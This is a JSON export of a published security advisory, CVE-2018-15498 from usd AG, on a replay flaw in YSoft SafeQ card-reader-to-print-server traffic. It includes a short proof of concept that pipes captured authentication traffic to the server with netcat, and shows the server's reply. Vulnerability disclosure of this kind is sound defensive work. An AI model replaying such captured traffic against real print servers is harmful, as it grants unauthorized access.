{"id":16565,"date":"2021-07-08T09:34:09","date_gmt":"2021-07-08T07:34:09","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2018-0021\/"},"modified":"2021-07-19T14:08:44","modified_gmt":"2021-07-19T12:08:44","slug":"usd-2018-0021","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2018-0021\/","title":{"rendered":"usd-2018-0021"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h1 class=\"h-custom-headline usd-small-letters h2\"><span>usd-2018-0021 | SafeQ Pro SmartCard\/v2<\/span><\/h1>\n<p><span><\/span><br \/><strong>Advisory ID<\/strong><span>: usd-2018-0021<\/span><br \/><strong>CVE number<\/strong><span>: CVE-2018-15498<\/span><br \/><strong>Affected Product<\/strong><span>: SafeQ Pro SmartCard<\/span><br \/><strong>Affected Version<\/strong><span>:<\/span><br \/><i>Card reader<\/i><span>: Terminal Pro SmartCardv2; MP04092 v. 3.15.0-rccc997 DEVEL<\/span><br \/><i>Server:<\/i><span> YSoft SafeQ 6<\/span><br \/><i>Client:<\/i><span> YSoft SafeQ client 6.0.13.1<\/span><br \/><strong>Vulnerability Type<\/strong><span>: Replay Attack<\/span><br \/><strong>Security Risk<\/strong><span>: Medium<\/span><br \/><strong>Vendor URL<\/strong><span>: <\/span><a href=\"https:\/\/www.ysoft.com\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.ysoft.com\/<\/a><br \/><strong>Vendor Status<\/strong><span>: Fixed<\/span><\/p>\n<h3><\/h3>\n<h3>Description<\/h3>\n<p>The communication between the card reader and the print server is vulnerable against replay attacks.<br \/>An attacker can record the network traffic between the card reader and the print server and thereby reissue a print job.<\/p>\n<p>An attacker records the network traffic between card reader and print server. A valid connection request, including authentication, can later be resent to the print server by the attacker and thereby she can gain unauthorized access. Recording the network traffic can be done with the help of a packet analyzer. The attacker can place the analyzer hardware between the card reader and switch the reader is connected to. Thereafter she can, independent from any timing, resend the recorded packages to the server.<\/p>\n<p><span><\/span><\/p>\n<h3>Proof of Concept (PoC)<\/h3>\n<p><span>The recorded network traffic can be sent to the print server using the tool nc (netcat). In the following example, the file raw.txt contains the record of the network traffic.<\/span><\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]root@local: cat raw.txt<br \/>\n.SQ 3.15.0-rccc9976 SQPRH373535862E<br \/>\n.CFG gd lang=EN quota=1 puk=2 remotejob=1 billcode=1 joblist=2 auth=1<br \/>\ncardoutdialog=1 printsendend=1 secure=<br \/>\nroot@local: cat raw.txt | nc [print server IP] 4096<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<div class=\"x-text\">\n<p>The answer of the server was recorded using wireshark.<\/p>\n<\/div>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"].SQ OK<br \/>\n.CFG OK | joblist=Mg== auth=MQ== jobpreview=MQ==<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n<p><span>The corresponding document will be printed again. The successful attack can be verified by the server log files.<\/span><\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<div class=\"e16902-22 x-container max width\">\n<div class=\"e16902-23 x-column x-sm x-1-1\">\n<h3>Fix<\/h3>\n<p><span>The network traffic should be secured by standard transport security protocols. We strongly recommend the use of TLSv1.2.<\/span><\/p>\n<h3><\/h3>\n<h3>Timeline<\/h3>\n<ul>\n<li>2018-07-02 First contact request via info@ysoft.com<\/li>\n<li>2018-07-16 Second contact request via press@ysoft.com<\/li>\n<li>2018-07-20 YSoft replied and urged for information about the security issue<\/li>\n<li>2018-07-20 YSoft received the information about the security issue<\/li>\n<li>2018-08-06 YSoft requested to extend the full disclosure date to 15.09.2018<\/li>\n<li>2018-08-09 CVE-ID was requested<\/li>\n<li>2018-08-18 CVE Mitre replied with suggested description and CVE-ID, which was forwarded to YSoft<\/li>\n<li>2018-09-07 vendor states to have fixed the vulnerability in version YSoft SafeQ 6 MU23<\/li>\n<li>2018-11-19 The advisory has been published<\/li>\n<\/ul>\n<h3><\/h3>\n<h3>Credits<\/h3>\n<p><span>These security vulnerabilities were found by Ca Way Le and Stefan Schmer of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2018-0021 | SafeQ Pro SmartCard\/v2 Advisory ID: usd-2018-0021CVE number: CVE-2018-15498Affected Product: SafeQ Pro SmartCardAffected Version:Card reader: Terminal Pro SmartCardv2; MP04092 v. 3.15.0-rccc997 DEVELServer: YSoft SafeQ 6Client: YSoft SafeQ client 6.0.13.1Vulnerability Type: Replay AttackSecurity Risk: MediumVendor URL: https:\/\/www.ysoft.com\/Vendor Status: Fixed Description The communication between the card reader and the print server is vulnerable against replay attacks.An [&hellip;]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16565","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16565","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16565"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16565\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16565"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}